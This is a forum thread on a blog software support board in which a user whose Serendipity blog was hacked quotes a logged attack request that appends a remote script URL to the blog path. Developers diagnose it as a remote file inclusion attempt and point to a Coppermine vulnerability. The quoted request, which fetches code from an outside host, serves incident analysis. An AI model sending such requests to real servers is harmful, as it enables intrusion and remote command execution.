Possible execution of malicious code

Found a bug? Tell us!!
Post Reply
Shaun.Mitchell
Posts: 3
Joined: Wed Jan 02, 2008 8:55 pm

Possible execution of malicious code

Post by Shaun.Mitchell »

My Serendipity blog was hacked today and my hosting provider is saying that it is a bug with Serendipty (don't all hosting providers blame the software and not their server :))

I'm not sure if this is possible but this is what they are saying was run:

GET /blog/index.php?/archives/
24MCTSSQLServer2005.html27kfl209.85.165.104/
cache:uRVO84x_ygMJ:www.verticalevolution.com/blog/index.php3F/
archives/24MCTSSQLServer2005.html=http://www.dreamplay.com.br/PSD/x.txt?

This is the key: http://www.dreamplay.com.br/PSD/x.txt looking at this it's a script that runs commands against the server and sends the results to an IRC channel.

Any thoughts on this from anyone? I'm hoping it's a server issue and not a serendipity issue.
Top
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:
Contact garvinhicking

Re: Possible execution of malicious code

Post by garvinhicking »

Hi!

I tried to reproduce this, but using my own URLs this doesn't really work.

Actually, I don't think there's a place where Serendipity can include remove HTTP url codes as a PHP include command, so I don't see any vulnerability here.

I agree the URL looks like a hack, but to me it does not seem to do anything.

Instead of "http://www.dreamplay.com.br/PSD/x.txt" I created my own file: http://garv.in/test.txt -- if it had worked, on the vulnerable server an "/tmp/evil.txt" file would have been created, which is not the case.

Which serendipity version were you using? Was any other software running on your website, apart from Serendipity? It seems the URL is just a usual attack of remote software that tries to append its URL to see if remote code is executed.

What wonders me is this "MCTSSQLServer2005" stuff. This seems to stem from a hack attack where people tried to exploit the vulnerability in the Microsoft SQL Sserver, which does surely not work with Serendipity. ;)

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
Top
Shaun.Mitchell
Posts: 3
Joined: Wed Jan 02, 2008 8:55 pm

Post by Shaun.Mitchell »

Thanks for the quick reply. I was runngin version 1.2.1 but just finished upgrading. The SQLServer stuff was a blog post of mine with that title. I really didn't think that there was a case of them being able to run executable code in the URL but just wanted to make sure. I have the integration into the coppermine photo gallery on the site as well.

Thanks again.
Top
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:
Contact garvinhicking

Post by garvinhicking »

Hi!

I believe Coppermine exploits have been around the last couple of days. This seems like a good suspect!

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
Top
judebert
Regular
Posts: 2478
Joined: Sat Oct 15, 2005 6:57 am
Location: Orlando, FL
Contact:
Contact judebert

Post by judebert »

Indeed, on the Coppermine home page they indicate an SQL injection vulnerability only a month old. If you had a version older than 1.4.18, it was vulnerable and needs to be upgraded.
Judebert
---
Website | Wishlist | PayPal
Top
Post Reply

Return to “Bugs”